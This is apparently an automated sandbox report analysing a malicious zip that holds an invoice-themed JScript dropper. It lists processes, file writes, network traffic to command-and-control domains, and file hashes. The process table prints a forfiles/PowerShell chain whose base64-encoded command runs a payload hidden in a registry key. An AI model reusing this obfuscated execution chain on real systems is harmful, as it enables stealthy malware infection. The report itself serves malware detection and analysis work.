Field | Value |
---|---|
File name | Nuovo documento 1.zip |
Full analysis | https://app.any.run/tasks/acc80e15-476f-46bd-b0dd-287580975e1e |
Verdict | Malicious activity |
Analysis date | July 17, 2019, 06:23:11 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags | |
Indicators | |
MIME | application/zip |
File info | Zip archive data, at least v1.0 to extract |
MD5 | 6E337DB06E57230F84D7F42B84444E94 |
SHA1 | 4F7F101C0A1AB313428FB4CAE473B5FD0F633840 |
SHA256 | 2A64599F3F28D13C2F0F80794002B52CAA6CCC4E57E843CFA32E888F9D215D44 |
SSDEEP | 3072:dmkPjVUE42lTsIsrF5B4+qaQP7MtE+TTzP40L7/UMvxlDQU3bTEhTEEnLMzR9roQ:dmkrifoTqrFftQvO7sMZg+GMzRuli |
Extension | Description |
---|---|
.zip | ZIP compressed archive (100) |

Field | Value |
---|---|
ZipRequiredVersion | 10 |
ZipBitFlag | - |
ZipCompression | None |
ZipModifyDate | 2018:07:17 11:45:02 |
ZipCRC | 0x00000000 |
ZipCompressedSize | - |
ZipUncompressedSize | - |
ZipFileName | Nuovo documento 1/ |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2072 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\Nuovo documento 1.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
2720 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Nuovo documento 1\Fattura_32423.js" | C:\Windows\System32\WScript.exe | — | explorer.exe |
2124 | C:\Users\admin\AppData\Local\Temp\tmp.exe | C:\Users\admin\AppData\Local\Temp\tmp.exe | — | WScript.exe |
2820 | "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding | C:\Program Files\Internet Explorer\iexplore.exe | — | svchost.exe |
2568 | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2820 CREDAT:267521 /prefetch:2 | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | — | iexplore.exe |
548 | "C:\Windows\System32\forfiles.exe" /p C:\Windows\system32 /s /c "cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANQAxADEAQwBBAEEAQwAwAC0AQQAxADgANQAtADAANgBFADAALQA2ADUANgBBAC0ARQBFADIAQQBEADAAQgA1AEYARABFADUAfQAnACkALgBXAA==" /m p*ll.*e | C:\Windows\System32\forfiles.exe | — | explorer.exe |
2304 | /c "powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANQAxADEAQwBBAEEAQwAwAC0AQQAxADgANQAtADAANgBFADAALQA2ADUANgBBAC0ARQBFADIAQQBEADAAQgA1AEYARABFADUAfQAnACkALgBXAA== | C:\Windows\System32\cmd.exe | — | forfiles.exe |
2876 | powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANQAxADEAQwBBAEEAQwAwAC0AQQAxADgANQAtADAANgBFADAALQA2ADUANgBBAC0ARQBFADIAQQBEADAAQgA1AEYARABFADUAfQAnACkALgBXAA== | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
2628 | "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\opikqlw8.cmdline" | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe | — | powershell.exe |
944 | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESA3E9.tmp" "c:\Users\admin\AppData\Local\Temp\CSCA3E8.tmp" | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe | — | csc.exe |

PID | User | Company | Integrity level | Description | Exit code | Version |
---|---|---|---|---|---|---|
2072 | admin | Alexander Roshal | MEDIUM | WinRAR archiver | 0 | 5.60.0 |
2720 | admin | Microsoft Corporation | MEDIUM | Microsoft ® Windows Based Script Host | 0 | 5.8.7600.16385 |
2124 | admin | Cisco Systems, Inc. | MEDIUM | Cisco Systems VPN Client | 0 | 5.0.07.0440 |
2820 | admin | Microsoft Corporation | MEDIUM | Internet Explorer | 1 | 11.00.9600.16428 (winblue_gdr.131013-1700) |
2568 | admin | Microsoft Corporation | LOW | Internet Explorer | 0 | 11.00.9600.16428 (winblue_gdr.131013-1700) |
548 | admin | Microsoft Corporation | MEDIUM | ForFiles - Executes a command on selected files | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
2304 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
2876 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
2628 | admin | Microsoft Corporation | MEDIUM | Visual C# Command Line Compiler | 0 | 8.0.50727.5483 (Win7SP1GDR.050727-5400) |
944 | admin | Microsoft Corporation | MEDIUM | Microsoft® Resource File To COFF Object Conversion Utility | 0 | 8.00.50727.5003 (Win7SP1GDR.050727-5400) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2072 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2072.13958\Nuovo documento 1\zzzzz.jpg | — | — | — |
2072 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2072.13958\Nuovo documento 1\Fattura_32423.js | — | — | — |
1944 | explorer.exe | C:\Users\admin\Desktop\Nuovo documento 1 | — | — | — |
2820 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFAEB46C825A1A5A20.TMP | — | — | — |
2820 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\favicon[1].ico | — | — | — |
2820 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | — | — |
2876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T1SC0ZEK339DTPS766PN.temp | — | — | — |
2820 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF73E4A28FB930227B.TMP | — | — | — |
2820 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{80CEEEAB-A85B-11E9-9FBD-5254004AAD21}.dat | — | — | — |
2628 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCA3E8.tmp | — | — | — |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2820 | iexplore.exe | GET | 200 | 152.199.19.161:443 | https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblocklist.bin | US | — | — | whitelisted |
2124 | tmp.exe | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | binary | 19.8 Kb | unknown |
2124 | tmp.exe | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | binary | 35.6 Kb | unknown |
2820 | iexplore.exe | GET | 304 | 152.199.19.161:443 | https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlistWin7.xml | US | — | — | whitelisted |
2568 | IEXPLORE.EXE | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | text | 44.4 Kb | unknown |
2124 | tmp.exe | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | binary | 29.4 Kb | unknown |
2124 | tmp.exe | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | binary | 465 b | unknown |
2124 | tmp.exe | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | binary | 37.7 Kb | unknown |
2124 | tmp.exe | POST | 200 | 46.17.46.71:443 | https://kolaandpepsi.com/index.htm | RU | binary | 31.1 Kb | unknown |
2820 | iexplore.exe | GET | 200 | 152.199.19.161:443 | https://iecvlist.microsoft.com/IE11/1479242656000/iecompatviewlist.xml | US | xml | 357 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2820 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2124 | tmp.exe | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
1944 | explorer.exe | 93.170.76.72:443 | cocoon1city.com | RECONN. Operator Svyazi, LLC | RU | unknown |
2568 | IEXPLORE.EXE | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
2820 | iexplore.exe | 204.79.197.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
2820 | iexplore.exe | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
2320 | IEXPLORE.EXE | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
2788 | IEXPLORE.EXE | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
1448 | IEXPLORE.EXE | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
952 | IEXPLORE.EXE | 46.17.46.71:443 | kolaandpepsi.com | LLC Baxet | RU | unknown |
Domain | IP | Reputation |
---|---|---|
kolaandpepsi.com | | unknown |
api.bing.com | | whitelisted |
www.bing.com | | whitelisted |
iecvlist.microsoft.com | | whitelisted |
r20swj13mr.microsoft.com | | whitelisted |
cocoon1city.com | | unknown |
curlmyip.net | | shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (curlmyip .net in DNS lookup) |
— | — | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (curlmyip .net in DNS lookup) |
— | — | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (curlmyip .net in DNS lookup) |
Process | Message |
---|---|
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774; *** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774; *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144 |